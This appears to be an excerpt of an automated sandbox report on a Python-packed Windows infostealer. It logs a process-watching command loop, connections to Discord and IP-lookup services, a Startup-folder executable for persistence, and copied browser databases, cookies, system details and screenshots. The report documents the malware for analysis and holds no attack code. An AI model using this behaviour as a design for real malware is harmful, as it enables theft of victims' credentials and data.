C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 virustotal.neocities.org udp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 162.159.137.232:443 discord.com tcp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.137.232:443 discord.com tcp
US 172.67.74.152:443 api.ipify.org tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.137.232:443 discord.com tcp
US 162.159.134.234:443 gateway.discord.gg tcp
US 104.237.62.213:443 api64.ipify.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.136.232:443 discord.com tcp
N/A 127.0.0.1:53586 tcp
GB 142.250.180.14:443 www.youtube.com tcp
GB 142.250.178.14:443 www.youtube.com udp
US 8.8.8.8:53 rr1---sn-aigzrnze.googlevideo.com udp
GB 142.250.179.246:443 i.ytimg.com tcp
GB 74.125.175.230:443 rr1---sn-aigzrnze.googlevideo.com tcp
GB 74.125.175.230:443 rr1---sn-aigzrnze.googlevideo.com tcp
US 8.8.8.8:53 246.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 230.175.125.74.in-addr.arpa udp
GB 142.250.179.246:443 i.ytimg.com udp
BE 142.251.173.84:443 accounts.google.com tcp
BE 142.251.173.84:443 accounts.google.com udp
GB 142.250.187.196:443 www.google.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com udp
GB 216.58.213.10:443 jnn-pa.googleapis.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com tcp
AU 74.125.152.8:443 rr3---sn-ntqe6nes.googlevideo.com tcp
GB 216.58.213.10:443 jnn-pa.googleapis.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 172.217.16.225:443 yt3.ggpht.com tcp
GB 142.250.179.238:443 play.google.com udp
GB 216.58.213.14:443 youtube.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.179.238:443 play.google.com udp
GB 88.221.134.2:443 www.bing.com tcp
GB 88.221.134.2:443 www.bing.com tcp
GB 88.221.135.19:443 th.bing.com tcp
GB 88.221.135.19:443 th.bing.com tcp
GB 88.221.135.24:443 th.bing.com tcp
GB 88.221.135.24:443 th.bing.com tcp
NL 40.126.32.136:443 login.microsoftonline.com tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
GB 142.250.178.14:443 www.youtube.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI47442\gevent-24.11.1.dist-info\INSTALLER

C:\Users\Admin\AppData\Local\Temp\_MEI47442\ucrtbase.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\python312.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\base_library.zip

C:\Users\Admin\AppData\Local\Temp\_MEI47442\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47442\libffi-8.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47442\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47442\libcrypto-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-utility-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-time-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-string-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-stdio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-runtime-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-process-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-math-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-locale-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-heap-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-filesystem-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-environment-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-convert-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-crt-conio-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-util-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-timezone-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-sysinfo-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-sysinfo-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-synch-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-synch-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-string-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-rtlsupport-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-profile-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-processthreads-l1-1-1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-processthreads-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-processenvironment-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-namedpipe-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-memory-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-localization-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-libraryloader-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-kernel32-legacy-l1-1-1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-interlocked-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-heap-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-handle-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-file-l2-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-file-l1-2-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-file-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-fibers-l1-1-1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-fibers-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-errorhandling-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-debug-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-datetime-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\api-ms-win-core-console-l1-1-0.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\python3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\libssl-3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI47442\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI47442\pyexpat.pyd

memory/4368-1291-0x0000022437720000-0x0000022437721000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l3p5s4q51fqzem5z.exe

C:\Users\Admin\AppData\Local\Temp\_MEI1122\zope.event-5.0.dist-info\namespace_packages.txt

memory/5712-3612-0x0000018356E10000-0x0000018356E32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukvqcvow.04l.ps1

C:\Users\Admin\AppData\Local\Temp\downloads_db_spma

C:\Users\Admin\AppData\Local\Temp\autofill_db_n8s6

C:\Users\Admin\AppData\Local\Temp\history_db_m7vb

C:\Users\Admin\AppData\Local\Temp\autofill_db_r4lc

C:\Users\Admin\AppData\Roaming\vault\credentials\cookies.txt

C:\Users\Admin\AppData\Roaming\vault\system\installed_apps.txt

C:\Users\Admin\AppData\Roaming\vault\system\machineinfo.txt

C:\Users\Admin\AppData\Roaming\vault\system\tasklist.txt

C:\Users\Admin\AppData\Roaming\vault\system\tree.txt

C:\Users\Admin\AppData\Roaming\screenshots\sss_2451.png

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c08f7091-16cd-40a2-8ad6-92320381be34.tmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5db47e.TMP

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Roaming\screenshots\7816.png

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5e0472.TMP

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\de0d565e-9d96-4c82-a6c8-46fc5765a45c\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\de0d565e-9d96-4c82-a6c8-46fc5765a45c\index-dir\the-real-index~RFe5e0f50.TMP

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5e6436.TMP

C:\Users\Admin\AppData\Roaming\screenshots\3547.png

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\2c4a1231-d559-4c3c-a2de-80e885046c8e.tmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

C:\Users\Admin\AppData\Roaming\screenshots\6290.png
